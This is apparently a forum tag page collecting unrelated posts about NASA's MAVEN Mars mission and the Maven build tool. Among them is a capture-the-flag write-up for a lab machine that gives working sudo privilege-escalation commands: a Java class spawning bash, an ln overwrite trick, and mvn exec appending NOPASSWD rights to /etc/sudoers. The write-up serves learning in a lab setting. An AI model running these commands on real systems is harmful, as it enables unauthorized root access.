/tag/MAVEN

NASA NASA Says Farewell to MAVEN Mars Mission, Hosts Media Call Today - NASA The first mission devoted to observing the Martian atmosphere and its evolution, NASA’s MAVEN (Mars Atmosphere and Volatile Evolution), has ended after more [!quote]+ 首个专门观测火星大气及其演化的任务——NASA的MAVEN（火星大气与挥发性演化）在火星轨道运行超过11年后结束，且比其主要任务一年后还晚了十年。航天器最后一次被听到是在12月6日，当时它在经过红色行星后方时出现了意外的信号丢失。 该机构于2月召开异常审查委员会，评估回收工作并评估航天器可能的当前状态。审查委员会认定MAVEN航天器不可回收，已无法执行科学和数据中继任务，这与任务团队的结论一致。 MAVEN在12月飞船穿越火星后方前的遥测数据显示所有子系统正常工作。航天器出现后，NASA深空网络（DSN）未观测到信号。DSN开环接收机记录的无线电信号分析中获得的简短遥测数据片段显示，航天器处于安全模式，且旋转速度异常高，显示MAVEN轨道轨迹受扰。审查委员会得出结论，由于旋转，航天器电池耗尽，导致通信系统断电，MAVEN处于无法恢复的状态。 这些初步发现未能解决异常的潜在根本原因，异常仍在调查中。审查委员会预计将在今年晚些时候提交最终报告。NASA已开始正式退役MAVEN任务的程序，按照标准程序为科学和探索界存档完整任务数据集。 1 个帖子 - 1 位参与者 阅读完整话题

JAVA开发，用Maven拉取依赖时，报错：sun.security.validator.ValidatorException: PKIX path building failed 网上好多说法是要下载并导入远程中央仓库的证书，但是导入后还是报错： java.lang.RuntimeException: Unexpected error: java.security.InvalidAlgorithmParameterException: the trustAnchors parameter must be non-empty 有没有佬友遇到过呢？ 2 个帖子 - 2 位参与者 阅读完整话题

IT之家 6 月 4 日消息，美国国家航空航天局（NASA）即将告别旗下功勋卓著的火星轨道探测器之一。 经过数月反复尝试仍无法重新联络火星大气与挥发物演化探测器（MAVEN）后，NASA 正式宣布这颗红色星球探测器任务终结。NASA 深空测控网于 12 月 6 日接收到 MAVEN 最后一次传回的信号，此后这颗太阳能探测器运行至火星背面，通讯被星体遮挡。据 NASA 事故审查委员会今年 2 月发布的报告，探测器从火星另一侧飞出后，遥测数据显示设备自动切入安全模式，并以无法控制的旋转姿态翻滚，最终导致电力耗尽。 NASA 发布公告称，此后所有联络 MAVEN 的尝试悉数失败。NASA 官员于 6 月 3 日召开新闻发布会，官宣 MAVEN 任务落幕。探测器在火星背面突发故障的具体原因仍在调查之中。 MAVEN 宣告退役，为其十余年的火星探测科研生涯画上句号。该探测器 2013 年 11 月由联合发射联盟的阿特拉斯五号运载火箭发射升空，并在十个月后进入火星环绕轨道。 MAVEN 首席研究员香农 · 库里在周三的线上会议中评价，它是“史上最出色的火星探测任务”。项目负责人迈克 · 莫罗高度赞扬研发运维团队，坦言：“任务落幕，我们如同痛失至亲。” 库里对此深有同感，但着重盘点了探测器创下的诸多科研成果：“全体团队成员固然满心失落，但与此同时，我们为过去十年取得的科研成果倍感自豪。”她称赞 MAVEN 是“全太阳系内研究大气逃逸现象的顶尖观测设备”。 莫罗表示，故障审查委员会研判，探测器在去年 12 月故障发生后的数小时内大概率彻底断电，“供电中断最终造成通讯系统失效，探测器彻底无法修复”，他还补充：“事故调查组仍在深挖故障的根本原因。” 据IT之家了解，MAVEN 原定在轨任务周期仅 1 个地球年，因设备工况始终稳定优异，任务先后多次延期，额外服役十年。MAVEN 陨落之后，目前仍在火星轨道正常服役的 NASA 探测器仅剩两枚：2001 年升空的火星奥德赛号、2005 年发射的火星勘测轨道飞行器（MRO），二者服役时长也早已远超最初设计任务期限。 MAVEN 曾是 NASA 五台火星车中继通讯卫星之一，其余四台仍保持在轨运行，分别是奥德赛号、火星勘测轨道飞行器，以及欧洲空间局的火星快车、微量气体轨道器。 MAVEN 是人类首台搭载专用探测仪器、系统性研究火星大气演化及其与太阳风相互作用的探测器。即便在探测器失联之后，其在轨采集的海量数据仍会持续助力科学家斩获多项全新科研发现。 NASA 行星科学部主任路易丝 · 普罗克特在官方通告中提到：“MAVEN 积攒的探测数据，在未来数十年里仍会持续为火星研究提供关键参考。” 库里也表示：“我们即将归档的海量观测数据集，还蕴藏着大量有待深挖的科研价值。”

我发现AMP CODE已经无了supermaven也不得劲还有什么好的代替cursor的吗。（有些需求很专都不知道怎么vibe coding） 9 个帖子 - 6 位参与者 阅读完整话题

靶机来自 MazeSec（迷踪安全）： MazeSec | About 靶机名：Pom 作者 ：Sublarge AI 总结 这篇复盘记录了一台 Linux 靶机从信息收集到 root 提权的完整过程。整体思路是：先通过 nmap / rustscan 发现异常端口 55555 ，再使用 openssl 连接 SSL 服务拿到初始 shell；随后进行本地信息收集，利用密钥文件解出 SSH 密码，稳定登录后通过 sudo -l 分析权限，依次借助 Java 执行、软链接覆盖和 Maven 插件命令执行完成横向移动与提权。 核心知识点包括：端口扫描与服务识别、异常端口利用、socat shell 原理、Linux 本地枚举、密钥文件解密、sudo 权限分析、Java 代码执行、软链接利用，以及 Maven 命令执行提权。 这是我通关的第一台靶机，今天来好好复盘一下，毕竟很多东西我完全不知道，都是ai的。 复盘就不说主机发现了，毕竟真实环境也不会在同网段吧。 靶机ip： 10.216.75.62 信息收集 拿到靶机第一步肯定是信息收集扫端口，目前对我来说nmap扫端口的功能就够了，但是我习惯用 rustscan 调用nmap的脚本深度扫一下，然后用ai工具总结一下。（总觉得会发现多一点东西），还有就是以后会遇到有敲门等功能， rustscan 的多线程是很有可能直接敲开的（但是好像必须是顺序敲门，这也是敲门策略的大忌，但是不排除就是有人这么设置吧，毕竟最大的漏洞就是人），ok不扯了。 nmap -p- 10.216.75.62 #-p-表示全端口扫描，也可以 -p 指定端口，例如:nmap {ip} -p 22 看到除了22端口外(22是ssh默认端口，所以靶机都会开的)，还开了 80、55555 端口，这个55555就很不正常，应该有什么特殊的东西。 55555 我们暂时没有任何信息，所以没办法入手，所以只能去web端口看一看。 是一个 Spring Boot 框架的默认错误页面 也是什么都没有，那这时候一般就会去扫一遍目录了。 扫了目录也没有什么有用的东西，这个时候基本就线索断了。 那么我们只能寄希望于 55555 端口了。但是我们根本不知道这是什么，所以回去进行进一步探测。 我们用 rustscan 扫一下，他是会自动调用nmap脚本深入探测的。 rustscan -a 10.216.75.62 -p 55555 --ulimit 5000 -- -A -sC -sV 输出很多，我们用ai总结一下。 这里顺便打个广告，自己写的小工具，调用llm-api自动总结上一条命令。 终端命令-what ，（随意开发的，也就vibe了一两天，有什么建议都可以提提issues，点点star） 效果大概这样： 我们直接按照ai给的建议来建立ssl连接。 openssl s_client -connect 10.216.75.62:55555 -quiet 直接就弹回来一个shell了。成功拿到user-flag flag{user-f823e147843dd5b23f0ac9d243ae12fb} 复盘-shell来源 这里好奇为什么能直接获得一个shell呢。 我们ps看一下当前的进程(前面一些没用的就不看了)： 我们看到这一行 2438 mav1234 0:00 socat -d -d OPENSSL-LISTEN:55555,cert=/home/mav1234/.local 有一个进程以 mav1234 的身份在用 socat 监听55555端口，应该是一个定时任务 cert=/home/mav1234/.local 是用于验证的证书 所以我们用 openssl 向该端口发起连接请求，就会弹回来一个 mav1234 的shell了。 这里其实就是反弹shell的逆向过程，我们主动连接靶机，这就要求靶机上开放了特定端口有这个服务。而我们平时选择反弹shell就是因为，它不需要靶机开放什么服务，是靶机去主动连接我们 获得shell之后的信息收集 我们通常获得了基础的shell之后就要进一步的信息收集，因为在shell之外很多信息是收集不到或者不方便的。 最普遍的就是看看： sudo -l ：是否有一些特定的sudo权限 ls -l /home ：看看有哪些用户，判断是否会要横向，但是一般都是要的 ls -al /opt ： Optional Application Software （可选应用软件），除了apt等系统软件之外，很多自己安装的软件都会在这个目录下，比如手动安装的 Google Chrome 、 TeamViewer 、 MongoDB 、 PostgreSQL 、 Discord 、 VS Code 等，都可能出现在这里。靶机作者也经常把入口放在这里。 还有就是 /etc/passwd /etc/shadow 这些常规的文件了 其他就是得随机应变了，这些都没有思路的话再去深入的探索 我们这边先看一下家目录还一个文件。 sh-5.2$ cat journel cat journel I’ve encrypted my secret with my key. No one else can read it now. It’s safely hidden away:) # 我已经用我的密钥加密了我的秘密。现在除了我谁也读不到了。它安全地藏起来了:) 有秘密，应该是提示，找一下。 找到了 meta 文件和 pem 文件， meta是元数据，pem是证书，公钥私钥等文件。 猜测应该是meta用pem解密会得到什么东西。 我们还是可以用openssl来解密。 得到 MvxPf8yCB8lxXk5A ，猜测是ssh密码，我们尝试ssh登录稳定一下shell（因为这样ssl连接的shell很不稳定，用起来不方便） 登录成功。 再信息收集一下 看到有3个用户，并且我们有另外一个用户的 java 权限。那很明显就是用java横向了。相当于任意java代码执行了。 先写一个java的一句话木马， -bash-5.2$ cat Exploit.java public class Exploit { public static void main(String[] args) throws Exception { ProcessBuilder pb = new ProcessBuilder("/bin/bash"); pb.inheritIO(); pb.start().waitFor(); } } sudo -u qc2000 /usr/bin/java -cp /tmp Exploit 这里就横向成功了，但是这里要注意的是，不要放在自己家目录，因为 qc2000 可能会没有权限访问，所以会报错找不到class文件。 接着看一下sudo权限。 bash-5.2$ sudo -l Matching Defaults entries for qc2000 on Pom: secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin Runas and Command-specific defaults for qc2000: Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL" User qc2000 may run the following commands on Pom: (terra536) NOPASSWD: /home/terra536/ln 有一个ln命令的权限，应该就是打软连接，首先想到的是连接ssh公钥之类的。 但是就算是有链接，不管是硬链接还是软连接，如果源文件没有权限，那链接文件也一样看不了。那就不是这么打的了。 这里有一个点，那就是这个 ln 命令 /home/terra536/ln 。这是家目录的ln，而不是 /usr/bin 下面的 我们是不是可以尝试修改这个命令呢。 写一个shell脚本 用 /home/terra536/ln 打把shell脚本给链接到自己上面（用-f参数强制覆盖原来内容） 然后我们运行 /home/terra536/ln 就相当于在运行shell脚本了，而且是以 terra536 的身份运行的 开始 qc2000@Pom:/tmp$ chmod +x /tmp/hacker.sh qc2000@Pom:/tmp$ cat hacker.sh #!/bin/bash /bin/bash -i qc2000@Pom:/tmp$ sudo -u terra536 /home/terra536/ln -sf /tmp/hacker.sh /home/terra536/ln qc2000@Pom:/tmp$ sudo -u terra536 /home/terra536/ln Pom:/tmp$ id uid=1002(terra536) gid=1002(terra536) groups=1002(terra536) Pom:/tmp$ whoami terra536 ``` 最后就是maven的插件命令执行提权，因为我们有maven的root权限，只需要用maven执行对应的命令就好，反弹shell或者直接给其他用户无密码执行所有命令的权限，写进/etc/sudoers（这里是一种演示，还有很多其他插件，大家可以去学习一下。并且演示这种也是需要一个最小pom.xml文件的） ```bash bash-5.2# sudo /usr/bin/mvn exec:exec -Dexec.executable=/bin/sh -Dexec.args="-c 'echo \"terra536 ALL=(ALL) NOPASSWD: ALL\" >> /etc/sudoers'" [INFO] Scanning for projects... [INFO] [INFO] ---------------------------< hacker:exploit >--------------------------- [INFO] Building exploit 1.0 [INFO] from pom.xml [INFO] --------------------------------[ jar ]--------------------------------- [INFO] [INFO] --- exec:3.6.3:exec (default-cli) @ exploit --- [INFO] ------------------------------------------------------------------------ [INFO] BUILD SUCCESS [INFO] ------------------------------------------------------------------------ [INFO] Total time: 2.855 s [INFO] Finished at: 2026-05-01T22:56:54+08:00 [INFO] ------------------------------------------------------------------------ bash-5.2# sudo su - root@Pom:~# ls /root root.txt root@Pom:~# cat root.txt flag{root-4a29b2f65b40052a804c0cc4afb906bd} 2 个帖子 - 2 位参与者 阅读完整话题

想请教一下各位佬 背景: 1台阿里云服务器:准备部署一下开发环境,git,docker,maven等 问题: 由于一些网络原因,可能无法直接访问 解决方案: 1.1 安装clash、v2ray等软件走订阅 问题:查询相关帖子后有人提到容易被风控,封号 1.2 SSH 到海外机器开发,在甲骨文上还有2台新加坡的服务器做一个中转 因为想跟朋友合伙做1个开发的项目，且服务器是在他的名下实名制的，所以不考虑方案1了。 想请教一下大佬方案1.2会有问题吗？主要是为了解决访问git、docker、或者一些软件下载资源的网络问题。 21 个帖子 - 9 位参与者 阅读完整话题

一款轻量级的自动化部署工具，跨平台, 单文件运行,支持 Java/Maven 后端项目和 Node/NPM 前端项目的自动构建与部署。通过 Git 代码变化检测，实现只构建和部署有更新的模块，减少不必要的构建时间。支持配置定时任务、企业微信消息通知，并提供完整的执行日志记录。 项目地址: https://github.com/dhjz/dauto 效果图

一款轻量级的自动化部署工具，跨平台, 单文件运行,支持 Java/Maven 后端项目和 Node/NPM 前端项目的自动构建与部署。通过 Git 代码变化检测，实现只构建和部署有更新的模块，减少不必要的构建时间。支持配置定时任务、企业微信消息通知，并提供完整的执行日志记录。 项目地址: https://github.com/dhjz/dauto 效果图

美国航空航天局3日宣布，在火星轨道已运行超过11年的探测器“火星大气与挥发物演化任务”（MAVEN）正式结束。MAVEN探测器于2013年11月发射升空，2014年9月进入火星轨道，原计划任务期一年，此后持续运行并多次延长任务。该探测器2025年12月6日最后一次与地面通信后失联，已无法继续正常运行。美国航空航天局当时表示，MAVEN在绕过火星背面后未能恢复信号。（新华社）